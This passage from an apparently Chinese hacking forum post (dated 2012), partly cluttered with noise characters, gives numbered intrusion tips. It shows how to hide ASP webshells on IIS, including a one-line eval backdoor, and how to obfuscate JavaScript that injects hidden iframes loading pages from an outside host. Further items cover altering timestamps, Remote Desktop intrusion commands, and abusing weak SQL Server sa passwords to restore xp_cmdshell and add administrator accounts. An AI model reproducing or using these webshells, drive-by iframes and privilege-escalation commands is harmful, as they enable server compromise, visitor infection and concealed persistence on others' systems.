) P1 A7 e6 B% x& M: p5 t* j执行后可以用AT命令查看新加的任务
/ z: m: k, [- [+ r+ g- l用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。
1 V4 v* Y& ~" F+ B% G: T% E4 }, `& {9 ^& X b
53、隐藏ASP后门的两种方法8 o( y6 S* P! }9 ~ i" X
1、建立非标准目录:mkdir images..\
' `9 x3 S. \) K, N拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp# w; s- f- A" k; i- \- B- Y0 I
通过web访问ASP木马:http://ip/images../news.asp?action=login8 J7 v: o5 Z# E! R: U0 J# b
如何删除非标准目录:rmdir images..\ /s
/ ^ D3 |& u# ^. A4 a2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
. m7 I- V7 a1 B% tmkdir programme.asp
* ^3 [* F3 _; C, ^3 x6 M新建1.txt文件内容:<!--#include file=”12.jpg”-->6 \; T2 A) p+ k9 ]& @5 P# W5 h
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
7 S1 Y" z9 u! Y1 v9 \! tattrib +H +S programme.asp1 N6 t$ M: M, _" z! p
通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt0 k/ I, [" b t
/ O& y1 ~8 v8 v+ L* [+ v! H54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。+ {5 J6 I, U7 x A( V9 n7 ^
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。$ O P2 x( K; i" g" h* j/ }
1 h! V/ l% l- R7 x55、JS隐蔽挂马& Z$ D ]7 f" f! C1 D
1.
# Z! u' M s% Q. N$ uvar tr4c3="<iframe src=ht";
g) Q' c1 |' c5 U3 M+ d ^6 ntr4c3 = tr4c3+"tp:/";) x9 |8 |$ f. L) O
tr4c3 = tr4c3+"/ww";
/ [3 U8 f, }# R4 atr4c3 = tr4c3+"w.tr4";
+ ]* ^/ t* U* Gtr4c3 = tr4c3+"c3.com/inc/m";
: i3 L! W' W ftr4c3 = tr4c3+"m.htm style="display:none"></i";
+ G' t/ E' B" ?: ^0 atr4c3 =tr4c3+"frame>'";# g: n% {* s/ _# `* V4 W
document.write(tr4c3);
; s6 S2 I: e9 Z( X4 v* A避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
& V9 A3 D) ]" H' H+ S6 |9 p4 Z
2.
) H0 e/ o* n( x5 _转换进制,然后用EVAL执行。如
, J3 m1 T9 s0 |& F1 geval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
' u7 Q3 o5 y5 e& I+ i& b2 x. l不过这个有点显眼。6 K' d" T0 b/ ^; k- X
3.( J& E0 m% d2 @4 ?( a* D3 Q
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');
4 f3 q2 V6 E) n1 A6 u最后一点,别忘了把文件的时间也修改下。
1 H9 [+ P4 C. L6 Y
+ y& ~- b6 o( B9 n( a6 q1 j56.3389终端入侵常用DOS命令2 B9 @% U( x+ M( B
taskkill taskkill /PID 1248 /t
7 s& U3 a8 k c. d0 E3 s
( I# Z; I0 e5 }4 Atasklist 查进程1 p7 C T% q* F
6 ?; a5 z# Q$ M7 M3 o$ A% W& z; l
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限 {0 y9 T9 q) F" t' {
iisreset /reboot
& ]: M2 P+ R* p( q j ntsshutdn /reboot /delay:1 重起服务器
6 N9 p, Y6 z- Z3 [( s* w* L
( V2 c- x& n' j/ i, Ulogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
& T6 ^9 y. c3 r- s" c; y# Z8 I1 z5 ]( x3 v4 J( f) Z9 k
query user 查看当前终端用户在线情况
, ?8 o: ]8 L: ^3 z& H% b& _" p: \' {1 X
要显示有关所有会话使用的进程的信息,请键入:query process *
8 I; K8 I8 t% p% V8 H1 }% D
( Y. U- h/ ~/ s6 u* W要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2. W, d; K$ s+ y. G- f4 P
0 Q2 S4 C7 |# v* y
要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
' O' i; N$ X! t& S4 X# F# S' }1 U3 A( K
要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02# v& f- r, `9 t7 A' L
: E8 l: M! w9 z9 A命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启5 [0 f0 q4 e7 k ?+ _ ?) |5 [
! ]- t, `% R- q2 G) a
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
" g' g! W& H: D4 M/ m" n9 m/ x+ e8 T4 s/ ^3 _4 ~: q
命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。. [: j! B2 }5 n+ C9 N1 s& ?
9 |& I: Z" ]+ a4 r" H) q& p
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机
2 q9 ~+ ?: b. F* }* z1 r! F. L/ k2 T: e4 p+ S4 x) y
56、在地址栏或按Ctrl+O,输入:
; g: q9 \( P# vjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;" T2 |1 D, C, s8 V% L$ m
2 _: E' U1 c0 |6 H) k( f源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
# p& T- @2 \- {; T8 F" f- N7 \ b4 D; `
57、net user的时候,是不能显示加$的用户,但是如果不处理的话,* S* e. S) i+ h+ w0 ~
用net localgroup administrators是可以看到管理组下,加了$的用户的。
' e1 Y' e3 `" M7 t/ n( B6 m5 d! X* [% u4 J' K: \! t( r2 A( D( [% r' |
58、 sa弱口令相关命令/ \$ V" z7 @9 W
! x3 ]- x7 t; U" a0 X' L3 f, ~一.更改sa口令方法:% L! L, z6 R N5 ~
用sql综合利用工具连接后,执行命令:
* ]( L& {1 W1 a2 G3 f t7 ?7 [( fexec sp_password NULL,'20001001','sa'/ I0 {4 }9 n9 t! }6 v! _
(提示:慎用!)8 O0 v4 d/ G5 d$ R8 j/ U
; p$ W5 E9 a" g. B% [/ S二.简单修补sa弱口令.
, C- F$ }, ]/ L+ ~" P1 [6 _2 _* k. F/ s+ @/ T! E7 H! ` ]
方法1:查询分离器连接后执行:2 C! I3 G( Z& E6 y/ W% P
if exists (select * from1 H2 j! }1 v! F6 q' C# R
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
/ n! e6 X( W0 z6 HOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
/ |: @6 P8 L. B( i: j. a5 p+ z5 [% k+ U' \. w
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'6 m+ u! |: T, l& C
( l9 n% q6 p, l% n+ sGO: S; ^6 B+ f6 T
4 O, i# ?6 M5 M4 u, @- i
然后按F5键命令执行完毕
3 ~, u) I q4 S1 z2 Y: T3 s* o7 L* M; Y& e/ K) i
方法2:查询分离器连接后
) }& [! l. v1 L3 H( G$ X第一步执行:use master4 f8 v. z4 B& w% @9 S. c
第二步执行:sp_dropextendedproc 'xp_cmdshell'; h% \* o+ F! y( v; x
然后按F5键命令执行完毕8 l+ o9 D) x5 C5 _
, U0 v& X# a* Q" U
" w- b3 N; X+ |7 b6 i
三.常见情况恢复执行xp_cmdshell.
4 N8 `. k5 V0 I1 F
2 ?& N9 x" ^: o9 `5 C' F5 Q O9 [2 k" M, C* }: b' U* `* U- i; ]0 y
1 未能找到存储过程'master..xpcmdshell'. G0 z: |! \, ^6 |
恢复方法:查询分离器连接后,( o6 {/ M' P0 W
第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
" @! {1 H" }. F* q9 a$ }第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'7 ]- T$ N$ R; {% i6 M
然后按F5键命令执行完毕
, f% F4 B% ~/ g( o% h% d, P0 X- W# _7 Z
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
c, A$ T0 E& O1 S; H恢复方法:查询分离器连接后,
5 w0 h1 r% i1 U( t% {3 G第一步执行:sp_dropextendedproc "xp_cmdshell"/ p1 f/ H5 V2 o5 R6 G4 w* Q
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
( H9 z. G: }( Z# ], q然后按F5键命令执行完毕
8 b8 {/ S" L$ N; y9 X T% {( ~) O0 v6 O7 d. @
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。). R k% |2 e4 K3 q1 h
恢复方法:查询分离器连接后,- L: \# p8 U( k' V) H
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'3 j- K' i( T- E J
第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
$ I0 k. ^: l5 O- M; A4 N1 ]然后按F5键命令执行完毕
! z3 d- X1 e- a! g" J
4 w2 w8 _# w* ?# F. ^1 Z& w, Q+ Y四.终极方法.
: o/ l1 x- P& g W) x9 u如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:
) a$ |; \2 h8 V, C; K查询分离器连接后,
/ G; d3 i) T0 k5 c: Y# \2000servser系统:
6 u8 n) z$ H; e3 ~' Q T: B kdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'5 S b3 i$ {0 [$ O4 f, j5 `
, k6 k/ s8 F: fdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
5 p- @& Z) l/ r0 M! |, E( L1 k+ q" K5 x
xp或2003server系统:1 L0 z( W. c" b* S+ v
8 w4 ^; y% O. k7 n- I+ j x) ~
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
* i8 ?2 Z) A& {' w) c* v; L V. q& ^; d6 M: i
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'3 @+ \5 a. u5 k8 T8 ^
|
发表于 2012-9-15 14:51:03
收藏
支持
反对